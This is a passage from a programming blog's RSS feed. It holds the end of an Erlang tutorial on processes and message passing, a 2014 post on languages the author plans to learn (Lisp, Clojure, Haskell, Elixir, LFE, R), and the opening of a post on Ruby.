&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;register(pm, spawn(Pm)).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Finally we are going to create a really simple function that sends the task to the pm:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;39&amp;gt; NewTask = fun (Task) -&amp;gt; &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  io:format(&amp;quot;Client(~p):~n ~p~n---~n&amp;quot;, [self(), Task]),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  pm ! Task&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;end.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Time to send our task!&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;40&amp;gt; NewTask(&amp;quot;Add cover to TPS report&amp;quot;).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;And we get this output printed out:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Client(&amp;lt;0.32.0&amp;gt;):&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; &amp;quot;Add cover to TPS report&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;---&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;PM(&amp;lt;0.37.0&amp;gt;):&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; I received the following task: &amp;quot;Add cover to TPS report&amp;quot;.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; My job is to forward it to the developer&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;---&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;DEV(&amp;lt;0.36.0&amp;gt;):&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; I got a new task: &amp;quot;Add cover to TPS report&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;---&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-1MQrMONE3YjecZdrkdOhTg.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The Dev process could be running on a server in the US, the PM process on a Europe-based server, and the client, my shell, could be running on my computer here in Buenos Aires, Argentina. In another language this would require a really big code change; in Erlang it only requires adding a few lines of code. Technically, we would have to register the processes globally and set up some kind of VPN so that the virtual machines see each other as if on a local network. The point is that Erlang has distribution built in, and getting to the point where systems run on clusters is not difficult.&lt;&#x2F;p&gt;
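&lt;p&gt;As a rough sketch of what that would look like (the node names and cookie here are invented for illustration), a registered process on another node is addressed with a {Name, Node} tuple instead of just the name, assuming both nodes were started with a name and share the same cookie:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;%% On the US server, started with: erl -name dev@us.example.com -setcookie secret&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;%% register(dev, spawn(Dev)).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;%% From the PM node in Europe, the send only needs the node name added:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{dev, &#x27;dev@us.example.com&#x27;} ! Task.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;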
&lt;p&gt;For the following posts we leave error detection and supervision of processes, an area where Erlang really, really shines.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;moving-foward&quot;&gt;Moving forward&lt;&#x2F;h3&gt;
&lt;p&gt;You might be asking yourself why you would want to create processes and send messages between them. Sooner rather than later, in a relatively big project, you will need to parallelize some code: for example, a call to a third-party API that is taking too much time. That is when you will need a concurrency construct. In most programming languages, threads, processes or any construct related to concurrency or parallelism is something you rarely use; in most universities it is something you learn only after your first programming courses. You might have used a ThreadPool in Java or even a pthread in C, but it is not something you do as often as defining a class, instantiating an object, calling a function or writing a conditional statement. Even if this is changing, and we now have really interesting libraries, frameworks and toolkits like Akka for the Java world, Concurrent-Ruby or Celluloid for Ruby, or even languages like Clojure that already set a pretty high bar, truth be told concurrency is not the cornerstone of most languages. In Erlang you will use processes as frequently as you use an if construct in C, because they are cheap and great for designing your systems.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-o61yZIq3SpkTDPn-pzAJTA.gif&quot; alt=&quot;&quot; &#x2F;&gt;Message passing&lt;&#x2F;p&gt;
&lt;p&gt;Up to now we have only played with processes so that you can see how easy it is to use concurrency primitives in Erlang, since you do not need external library support as in most languages. You will see some of their real uses in the next posts. I must add that pattern matching plays an essential role too, and it is very well integrated with the rest, because it makes it very easy to select what to do based on the message received.&lt;&#x2F;p&gt;
&lt;p&gt;To sum up: thanks to message passing, pattern matching and lightweight processes you can avoid threads, mutexes, semaphores and a lot of deadly weapons that sooner rather than later will backfire.&lt;&#x2F;p&gt;
&lt;p&gt;Stay tuned, we will work on some real stuff next week: comments and threads, the HTTP endpoints of our commenting system!&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-1LLFcr72yLfiLfFloQHaeg.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;This is me after my first hour playing with Erlang!&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Languages I want to learn and use this 2014</title>
          <pubDate>Tue, 01 Apr 2014 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/languages-i-want-to-learn-and-use-this-2014/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/languages-i-want-to-learn-and-use-this-2014/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/languages-i-want-to-learn-and-use-this-2014/">&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;2025&#x2F;12&#x2F;1-w6YUSUjzOr5yeXXUggaEIg.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h4 id=&quot;take-aim-much-higher-than-the-mark&quot;&gt;Take aim much higher than the mark&lt;&#x2F;h4&gt;
&lt;hr &#x2F;&gt;
&lt;blockquote&gt;
&lt;p&gt;A wise man ought always to follow the paths beaten by great men, and to imitate those who have been supreme, so that if his ability does not equal theirs, at least it will savor of it. &lt;strong&gt;Let him act like the clever archers who&lt;&#x2F;strong&gt; , designing to hit the mark which yet appears too far distant, and knowing the limits to which the strength of their bow attains, &lt;strong&gt;take aim much higher than the mark&lt;&#x2F;strong&gt; , not to reach by their strength or arrow to so great a height, but &lt;strong&gt;to be able with the aid of so high an aim to hit the mark they wish to reach.&lt;&#x2F;strong&gt; —&lt;strong&gt;&lt;em&gt;Niccolo&lt;&#x2F;em&gt; &lt;em&gt;Machiavelli&lt;&#x2F;em&gt;&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;And that’s the excuse I have to explain why I want to learn so many languages in 2014.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;h3 id=&quot;lisp-common-lisp-and-clojure&quot;&gt;Lisp, Common Lisp and Clojure&lt;&#x2F;h3&gt;
&lt;p&gt;Immediately after reading &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;paulgraham.com&#x2F;avg.html&quot;&gt;Beating the Averages&lt;&#x2F;a&gt; from Paul Graham I wanted to learn Lisp:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;By induction, the only programmers in a position to see all the differences in power between the various languages are those who understand the most powerful one. (This is probably what Eric Raymond meant about Lisp making you a better programmer.) You can’t trust the opinions of the others, because of the Blub paradox: they’re satisfied with whatever language they happen to use, because it dictates the way they think about programs.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;However, I didn’t have enough time to do it. At that moment I was coding a lot in Ruby, Python, C++ and Java in order to earn enough to live on my own.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-uDtazbx2QjY_M5c2iu-gNQ.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Now that I am a better paid code monkey and have enough free time, I am reading &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;landoflisp.com&#x2F;&quot;&gt;The Land Of Lisp&lt;&#x2F;a&gt;. As I dive down the rabbit hole of the Lisp world, I am trying to create my own Emacs distribution called &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;pyotrgalois&#x2F;lunfardo&quot;&gt;Lunfardo&lt;&#x2F;a&gt;. I think it’s a good way to learn Emacs and Lisp. I hope to finish reading the book and the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;google&#x2F;lisp-koans&quot;&gt;Lisp Koans&lt;&#x2F;a&gt; in the following weeks.&lt;&#x2F;p&gt;
&lt;p&gt;A few weeks ago I read some chapters from &lt;strong&gt;Seven Concurrency Models in Seven Weeks&lt;&#x2F;strong&gt; by Paul Butcher. The chapter &lt;strong&gt;The Clojure Way — Separating Identity from State&lt;&#x2F;strong&gt; got my attention. After reading it, I investigated &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;clojure&#x2F;core.async&quot;&gt;core.async&lt;&#x2F;a&gt; and its &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;clojure.com&#x2F;blog&#x2F;2013&#x2F;06&#x2F;28&#x2F;clojure-core-async-channels.html&quot;&gt;channels&lt;&#x2F;a&gt;. It appears that, as in many great languages, there are &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;adambard.com&#x2F;blog&#x2F;clojure-concurrency-smorgasbord&#x2F;&quot;&gt;many flavors of concurrency in Clojure&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Then I watched &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.infoq.com&#x2F;presentations&#x2F;Value-Identity-State-Rich-Hickey&quot;&gt;Persistent Data Structures and Managed References&lt;&#x2F;a&gt; by Rich Hickey, the author of Clojure. Since I am interested in concurrency-related things and in Lisp, Clojure seems like a good next stop on my roadmap. So I added &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.braveclojure.com&#x2F;&quot;&gt;Clojure for the Brave and True&lt;&#x2F;a&gt; to the list of books I have to read in the next few weeks. As I read it, I hope to play with the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;functional-koans&#x2F;clojure-koans&quot;&gt;Clojure Koans&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;However, like most developers, I think the best way to learn a language is to use it in a real project. Therefore, I will try to implement a few of my ideas in Clojure.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-PyX6M9lSBXLHvVgAlDXrTA.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;h3 id=&quot;haskell&quot;&gt;Haskell&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-mIrYVuSZtaYe3WJkRwUqwQ.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The most important reason I want to learn Haskell is that two of the most intelligent people I know really love it, and that’s a good enough reason for me. After checking &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;learnxinyminutes.com&#x2F;docs&#x2F;haskell&#x2F;&quot;&gt;Learn X in Y minutes Where X=haskell&lt;&#x2F;a&gt;, the syntax seems quite simple. I have read complaints about it, but at this moment I really can’t see why. I will have to learn it before forming a strong opinion.&lt;&#x2F;p&gt;
&lt;p&gt;This video by Brian Beckman caught my attention: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=ZhuHCtR3xq8&quot;&gt;Don’t fear the Monad&lt;&#x2F;a&gt;. Even if monads are not unique to Haskell, they are especially important there, since Haskell is a pure language:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;Haskell functions are in general pure functions: when given the same arguments, they return the same results. The reason for this paradigm is that pure functions are much easier to debug and to prove correct. Test cases can also be set up much more easily, since we can be sure that nothing other than the arguments will influence a function’s result. We also require pure functions not to have side effects other than returning a value: a pure function must be self-contained, and cannot open a network connection, write a file or do anything other than producing its result. This allows the Haskell compiler to optimise the code very aggressively.&lt;br &#x2F;&gt;
However, there are very useful functions that cannot be pure: an input function, say getLine, will return different results every time it is called; indeed, that’s the point of an input function, since an input function returning always the same result would be pointless. Output operations have side effects, such as creating files or printing strings on the terminal: this is also a violation of purity, because the function is no longer self-contained.&lt;br &#x2F;&gt;
Unwilling to drop the purity of standard functions, but unable to do without impure ones, Haskell places the latter ones in the IO monad. In other words, what we up to now have called “IO actions” are just values in the IO monad.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;I have never used a really pure programming language. It’s time to check it out and weigh its benefits.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-3IMSBVSph3XTwJEidHh0tw.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;mrb_bk&quot;&gt;@mrb_bk&lt;&#x2F;a&gt;:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;Think of typechecking the same way you think of testing or even linting — an analysis phase that can help you gain confidence&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Once you grasp the deep connections that “propositions as types” has to offer, you’ll get hooked and long for correctness&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Proper modern languages will have modern type checkers that can seamlessly analyze programs and aid in annotation.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;I am also interested in using a language with a strong type system that actually adds something. In Java, C++ and similar languages I feel that I have to add a lot of information to my code without getting a real benefit. That’s why I prefer to use JavaScript, Python or Ruby. From what I have read, Haskell’s type system is really useful.&lt;&#x2F;p&gt;
&lt;p&gt;Finally, some years ago I played with &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;xmonad.org&#x2F;&quot;&gt;xmonad&lt;&#x2F;a&gt;, a tiling window manager that you configure in Haskell. For the last 4 or 5 years I have used its main competitor, awesome (configured with Lua). I want to learn Haskell to understand and use xmonad.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;h3 id=&quot;erlang-elixir-and-lfe&quot;&gt;Erlang, Elixir and LFE&lt;&#x2F;h3&gt;
&lt;p&gt;For the last 6 months I have been working as an Erlang developer. At the moment I am coding a messaging server for &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;whisper.sh&#x2F;&quot;&gt;Whisper&lt;&#x2F;a&gt;, using Elasticsearch to store the messages and Cowboy to create the web server endpoints.&lt;&#x2F;p&gt;
&lt;p&gt;I really like Erlang, even if I think its ecosystem leaves a lot of room for improvement. I am not a big fan of its Prolog-based syntax. I don’t think it’s complex or difficult, but the use of the comma &lt;strong&gt;‘,’&lt;&#x2F;strong&gt;, semicolon &lt;strong&gt;‘;’&lt;&#x2F;strong&gt; and period &lt;strong&gt;‘.’&lt;&#x2F;strong&gt; as terminators is cumbersome (you need to change the terminator almost every time you move a line) and doesn’t have any real benefit:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;devintorr.es&#x2F;blog&#x2F;2013&#x2F;01&#x2F;22&#x2F;the-excitement-of-elixir&#x2F;&quot;&gt;The excitement of Elixir&lt;&#x2F;a&gt;:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;Erlang’s syntax does away with nested statement terminators and instead uses expression separators everywhere. Lisp suffers the same problem, but Erlang doesn’t have the interesting properties of a completely uniform syntax and powerful macro system to redeem itself.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;It is not a real problem anyway. If you follow one of the three ways of reading Erlang code explained in the post &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;ferd.ca&#x2F;on-erlang-s-syntax.html&quot;&gt;On Erlang’s Syntax&lt;&#x2F;a&gt;, you will get it really fast. In general, I agree with &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;rvirding.blogspot.com&#x2F;2014&#x2F;01&#x2F;erlang-syntax-again-and-again-and-again.html&quot;&gt;Erlang syntax again … and again … and again …&lt;&#x2F;a&gt;:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;While I can understand people may dislike the syntax of a certain language, even I dislike some syntaxes, I don’t understand people who say “I was going to learn Erlang but the syntax was so strange I quit”.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;If you know that there are really awesome areas where &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;ferd.ca&#x2F;rtb-where-erlang-blooms.html&quot;&gt;Erlang BLOOMS&lt;&#x2F;a&gt;, you will learn the language even if it’s different from your main language.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;My point is that the syntax is the easy part of learning a new language, just look it up in the manual. It is learning the semantics of the new language and how to use it efficiently to solve your problems which are the major difficulties. How do I structure my solution to best make use of the language and its environment? This is where major rethinks will occur. This is what takes time to learn and understand. Not in what it looks like.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;I want to use Elixir on a daily basis not only because I think it has a better syntax:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;devintorr.es&#x2F;blog&#x2F;2013&#x2F;06&#x2F;11&#x2F;elixir-its-not-about-syntax&#x2F;&quot;&gt;Elixir: It’s Not About Syntax&lt;&#x2F;a&gt;:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;The great thing about the Elixir standard library is that with each release it can provide features that Erlang developers clamor for everyday. We have Erlangers, Clojurists, Haskellers, Rubyists, and Pythonistas trying to incorporate useful features into Elixir every day. Elixir isn’t afraid of introducing functionality that improves the lives of Elixir developers, and everything is on the table: new data structures, real Unicode support, anything.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;[…]&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Elixir isn’t the CoffeeScript of Erlang just as Clojure isn’t the CoffeeScript of Java. Just like Clojure, Elixir is more than a pretty face. Elixir is the power of it’s tooling, the expressiveness of it’s metaprogrammability, and the expansive feature set of it’s standard library while maintaining complete compatibility with—and heavily leveraging—OTP. Once again I have yet to adequately scratch the surface of what makes Elixir special, but I have more Elixir to write!&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;I had only played with Elixir for a few hours before learning and really using Erlang. I plan to use &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;dynamo&#x2F;dynamo&quot;&gt;Dynamo&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;elixir-lang&#x2F;ecto&quot;&gt;Ecto&lt;&#x2F;a&gt; instead of Node.js with Express or Erlang with Cowboy to create my next REST system. I will let you know if I find a real benefit to using it instead of Erlang.&lt;&#x2F;p&gt;
&lt;p&gt;Finally, I want to mention my latest discovery: Lisp Flavored Erlang (LFE).&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;Nothing Quite Compares to the taste of Erlang, aged in the oaken barrels of Lisp, served at a temperature of perfect hotness.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-Zv2If-7X5lPmvj_BAtOVIw.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I think this doesn’t need any more clarification. After learning Lisp I will give LFE a try. Check out its &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;lfe.github.io&#x2F;user-guide&#x2F;intro&#x2F;1.html&quot;&gt;awesome guide&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;r-programming-language&quot;&gt;R programming language&lt;&#x2F;h3&gt;
&lt;p&gt;A few months ago I bought a book called &lt;strong&gt;Exploring Everyday Things with R and Ruby&lt;&#x2F;strong&gt;. I saw its table of contents and I knew I wanted to read it.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;If you’re curious about how things work, this fun and intriguing guide will help you find real answers to everyday problems. By using fundamental math and doing simple programming with the Ruby and R languages, you’ll learn how to model a problem and work toward a solution.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Here are some of the questions you’ll explore:&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;- Determine how many restroom stalls can accommodate an office with 70 employees&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;- Mine your email to understand your particular emailing habits&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;- Use simple audio and video recording devices to calculate your heart rate&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;- Create an artificial society—and analyze its behavioral patterns to learn how specific factors affect our real society&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;I bet now you want to read it too. But that’s not all. Someone I really respect, Zed Shaw, wrote &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;zedshaw.com&#x2F;essays&#x2F;programmer_stats.html&quot;&gt;Programmers Need To Learn Statistics Or I Will Kill Them All&lt;&#x2F;a&gt;. At the end of the post he encourages you to learn R. I only know the basics of statistics, so I will try to kill two birds with one stone:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;Learning to use R will help you also learn statistics better.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-SgUML3Hsk6MNGH3uvn7VRw.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;A few weeks ago I started a Coursera course on &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.coursera.org&#x2F;course&#x2F;ml&quot;&gt;Machine Learning&lt;&#x2F;a&gt;. Apparently, R is also very useful if you are into machine learning. There is also an interesting O’Reilly book called &lt;strong&gt;Machine Learning for Hackers&lt;&#x2F;strong&gt; that uses R. Check them out if you are interested.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-ULb9lkajm38eGIfrtRX7ZQ.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;As you can see, I have a lot to learn this year. I hope I have inspired you to learn some of these languages!&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Is Ruby.nil? or Ruby.hype.dead? A current overview of Ruby</title>
          <pubDate>Thu, 27 Mar 2014 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/is-ruby-nil-or-ruby-hype-dead-a-current-overview-of-ruby/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/is-ruby-nil-or-ruby-hype-dead-a-current-overview-of-ruby/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/is-ruby-nil-or-ruby-hype-dead-a-current-overview-of-ruby/">&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;2025&#x2F;12&#x2F;1-9vg-qHXQqxgYWVwtmo_V1A.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h4 id=&quot;the-main-languages-i-ve-used-this-year&quot;&gt;The main languages I’ve used this year&lt;&#x2F;h4&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;My last post was a really short mention of the resources I have used to learn and develop my skills in JavaScript and Erlang. In this post I’m going to share some thoughts on Ruby’s present.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;ruby&quot;&gt;&lt;strong&gt;Ruby&lt;&#x2F;strong&gt;&lt;&#x2F;h3&gt;
&lt;p&gt;Oh my dear Ruby, son of Lisp, Perl, Eiffel and Smalltalk, time has passed, but I think you are still such an amazing creature. Sure, you need to resolve some issues. Everybody does. Some really intelligent doctors have stated that you are sick, that you might be dying; others are not so sure about that:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;jmoses.co&#x2F;2013&#x2F;12&#x2F;21&#x2F;is-ruby-dying.html&quot;&gt;Is Ruby Dying?&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;rubini.us&#x2F;2013&#x2F;10&#x2F;15&#x2F;introducing-rubinius-x&#x2F;&quot;&gt;Introducing Rubinius X&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;Good clarification about the previous post: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.infoworld.com&#x2F;t&#x2F;ruby-rails&#x2F;rubinius-seeks-modernize-not-bury-the-ruby-language-229445&quot;&gt;Rubinius seeks to modernize, not bury, the Ruby language&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;news.ycombinator.com&#x2F;item?id=6553767&quot;&gt;Discussion on Hacker News about Introducing Rubinius X&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
